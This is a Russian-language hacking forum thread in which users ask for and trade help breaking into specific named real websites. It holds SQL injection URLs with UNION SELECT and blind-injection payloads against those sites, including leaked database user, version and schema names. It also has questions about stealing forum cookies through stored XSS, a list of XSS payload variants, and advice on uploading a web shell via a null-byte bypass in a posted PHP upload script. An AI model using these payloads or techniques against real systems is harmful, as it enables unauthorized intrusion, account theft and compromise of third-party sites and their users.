Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kokes

    kokes New Member

    Joined:
    19 Aug 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://modcos.com/news.php?id=42
    нашол количество столбцов - 6
    но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.
    в чем причина?
     
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Там WAF, на связку UNION SELECT и при встрече OR, т.е. ORDER попадает тоже под фильтр.

    Ну... Крути как Blind:
    http://modcos.com/news.php?id=42+and+substring(version(),1,1)=5 - Валидный запрос
    http://modcos.com/news.php?id=42+and+substring(version(),1,1)=4 - FALSE

    Когда запрос вовзращает TRUE, то выводятся там все комментарии. Можно раскрутить как Blind.

    user() \ 033038003_adminm@localhost
    version() \ 5.0.67-percona-highperf-b7-log
    database() \ babinsoft_modcos
     
    1 person likes this.
  3. reddim

    reddim Banned

    Joined:
    2 Aug 2011
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    вообщем случайно нашел активную хсс
    и не понимаю как сделать так что бы воровались куки на форуме
    Сама активка на главной странице сайта site.com
    Если я кину сылку на форуме (на главную страницу с хсс)..это как бы получится пасивка же..как сделать в такой ситуации что бы при просмотре темы на форуме выполнялась активка?
    И какой толк в таких активках, например в поле имя при регистрации итд?
     
    #17703 reddim, 20 Aug 2011
    Last edited: 20 Aug 2011
  4. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    #17704 Dr..VATSON, 20 Aug 2011
    Last edited: 20 Aug 2011
  5. Samael91

    Samael91 New Member

    Joined:
    2 Dec 2010
    Messages:
    38
    Likes Received:
    0
    Reputations:
    0
    Подскажите почему не выводиться содержимое колонок?
    http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+users--
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    там нет такой таблички..потому и не выводит
     
  7. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Samael91, таблица `users` находится в БД `test_base`, текущая - `zorro_feb`.
    Code:
    http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+test_base.users+limit+1,1+--+
     
  8. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    PHP:
    <?php
    require_once "lib/JsHttpRequest.php";
    function 
    resizeimаgе($filename$newfile$newwidth$newheight)    {
    $exp=strrchr($filename".");
    list(
    $width$height) = getimagesize($filename);
    if(
    $width $height && $newheight $height){
    $newheight $height / ($width $newwidth);
    } else if (
    $width $height && $newwidth $width) {
    $newwidth $width / ($height $newheight);
    } else {
    $newwidth $width;
    $newheight $height;
    }

    $thumb imagecreatetruecolor($newwidth$newheight);
    if (
    $exp==".jpg" or $exp==".JPG" or $exp==".jpeg" or $exp==".JPEG")
    $source imagecreatefromjpeg($filename);
    if (
    $exp==".png" or $exp==".PNG")
    $source imagecreatefrompng($filename);
    if (
    $exp==".gif" or $exp==".GIF")
    $source imagecreatefromgif($filename);
    imagecopyresized($thumb$source0000$newwidth$newheight$width$height); 
    imagejpeg($thumb$newfile);
    return 
    true;
    imagedestroy($thumb);
    imagedestroy($source);

    $JsHttpRequest =& new JsHttpRequest("windows-1251");
    include(
    "admin/config.php");
    include (
    "lang/".$language."/language.php");
    $xxx $_REQUEST['xxx'];
    $upload_url $_REQUEST['url'];
    $thumb_size $_REQUEST['thumb_size'];
    $upl $_FILES['upl'];
    if (!
    is_numeric($thumb_size))
    die(
    $lerror1." <br> <a href='index.php' class='text1'>".$nazi."/a>");
    if (!
    is_numeric($xxx) and $xxx!="")
    die(
    $lerror2." <a href='index.php' class='text1'> ".$nazi."</a>");
    $ext = array("jpg""jpeg""JPG""JPEG""gif""GIF""png""PNG");
    $file_name=$upl['name'];
    if (
    $upload_url!="")
    $file_name=$upload_url;
    if (!
    in_array(end(explode("."$file_name)), $ext))
    die(
    $lerror3." <a href='index.php' class='text1'> ".$nazi."</a>");
    $file_name=md5(time().rand().time());
    if (
    $upload_url!="")
    $file_ext=explode("."$upload_url);
    else
    $file_ext=explode("."$upl['name']);
    if (
    $xxx==1)
    $url $file_name."_xxx.".end($file_ext);
    else
    $url $file_name.".".end($file_ext);
    $http_url explode("/"$_SERVER['REQUEST_URI']);
    foreach(
    $http_url as $key => $val)    {
    if (
    end($http_url)!=$val)
    $http .= $val."/";
    }
    $file_to_upload $upl['tmp_name'];
    if (isset(
    $upload_url)){
    $file_to_upload $upload_url;
    }

    include(
    "admin/config.php");
    if(
    $js==1)
    {
        
    $jsc="rel='lightbox'";
    }
    else
    {
        
    $jsc="";
    }

    $http_url "http://".$_SERVER['HTTP_HOST'].$http."upload_image/".$url;
    $http_thumb_url "http://".$_SERVER['HTTP_HOST'].$http."upload_image/thumb/".$url;
    if (
    copy ($file_to_upload"upload_image/".$url))    {
    resizeimаgе("upload_image/".$url"upload_image/thumb/".$url$thumb_size$thumb_size) or die("Error!");
    $result =  "<center><p>".$lyzezagry." <br> <a href='index.php' class='text1'> ".$leve."</a></p>";
    $result .= "<a ".$jsc." href='$http_url'><img src='$http_thumb_url' border=0></a><br><br>";
    if (
    $xxx==1)
    $result =  "<p>Изображение доступно только для лиц лет <br> <a href='index.php' class='text1'> Загрузить еще</a></p><a ".$jsc." href='$http_url'><img src='$http_thumb_url' border=0></a><br><br>";
    $result .= "<font>BBCode:</font><br>";
    $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"[img]".$http_url."[/img]\"><br><br>";
    $result .= "<font>HTML:</font><br>";
    $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"<a href='$http_url' target=_blank><img src='$http_thumb_url' border=0></a>\"><br><br>";
    $result .= "<font>".$ladressiii.":</font><br>";
    $result .= "<input class='form' type=\"text\" size=\"60\" onclick=\"this.select()\" value=\"$http_url\"><br><br>  </center>";
    echo 
    $result;
    }
    else
    die(
    $lerror2);

    ?>
    Скрипт заливки изображений, хочу чрез его залить шелл. Можно обойти фильтрацию?
     
  9. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    117
    Likes Received:
    45
    Reputations:
    5
    фильтрация защищена от заливки вроде полностью. кстати даже очень хорошо написан код)
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Только вот copy до некоторых версий принимает NULL-Байт как конец строки.

    PHP:
    ...
    $upload_url $_REQUEST['url'];
    ....
    $file_name=$upload_url;
    ...
    $url $file_name.".".end($file_ext);
    ...
    copy($file_to_upload"upload_image/".$url);
    ...
    Соответственно можно получить шелл(Если в этом каталоге запрещено выполнение PHP скриптов, можно перейти в другой.).

    Плюс ко всему через функцию copy можно копировать файлы не только переданные по HTTP, но и из внутренних каталогов системы.
    PHP:
    ...
    $upload_url $_REQUEST['url'];
    ....
    if (isset(
    $upload_url)){
    $file_to_upload $upload_url;
    }
    Так же тут может помочь эта уязвимость: https://forum.antichat.net/thread98525.html
     
  11. RexTiam

    RexTiam Member

    Joined:
    2 Nov 2009
    Messages:
    117
    Likes Received:
    45
    Reputations:
    5
    XAMEHA в данном коде нельзя будет применить copy для последнего байта
     
    1 person likes this.
  12. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    как раскрутить http://www.axess-industries.com/catalog/product.php?IdCategory=14130205 ? Помогите кто в курсе)
     
  13. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    нет тут скули.
    $IdCategory = (int)$_GET['IdCategory'];
     
  14. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Заранее спасибо.
    http://www.parabank.az/browse.php?lang=rus&page=-1%27
     
  15. boobl

    boobl New Member

    Joined:
    20 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    народ такой вопрос на одном сайте нашёл уязвимость, могу вывести картинку или текст на сайт GET запросом.
    Но не выходит вывести ни iframe ни javascript

    "><script>alert()</script> - в коде отображается, но когда смотрю через Developer Tools - то вижу - <script> </script>

    различные варианты:
    <TABLE BACKGROUND="javascript:alert('Я здесь был')">
    <DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">
    <DIV STYLE="width: expression(alert('Я здесь был '));">
    так же не запускают яву, куда дальше рыть? :(
     
  16. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Если все отображается, то этого должно быть достаточно. Посмотри в исходнике, может быть нужно закрыть несколько тегов сначала, а уже потом выводить свой скрипт.
     
  17. boobl

    boobl New Member

    Joined:
    20 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    код закрыт. там в инпут идёт код:
    ?FPriceMin="><script>alert();</script><img%20src="

    когда весь код сохраняют себе и запускаю как html - alert работает. на сайте нет, может быть защита обработки GET запросов? потому как:
    "><BGSOUND%20SRC="javascript:alert();"><img%20src="
    через обычный просмотр кода - <BGSOUND SRC="javascript:alert();">
    через Developer Tools - <bgsound src="javascript:void(0)"></bgsound>
     
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    а рой дальше в сторону того как, какой браузер как инфу отображает.
     
    _________________________
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Читай маны по скулям. Нет тут ничего.
     
  20. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    http://aqua-st.ru/catalog/102
    Помогите! Обычные трюки не проходят!
     
Thread Status:
Not open for further replies.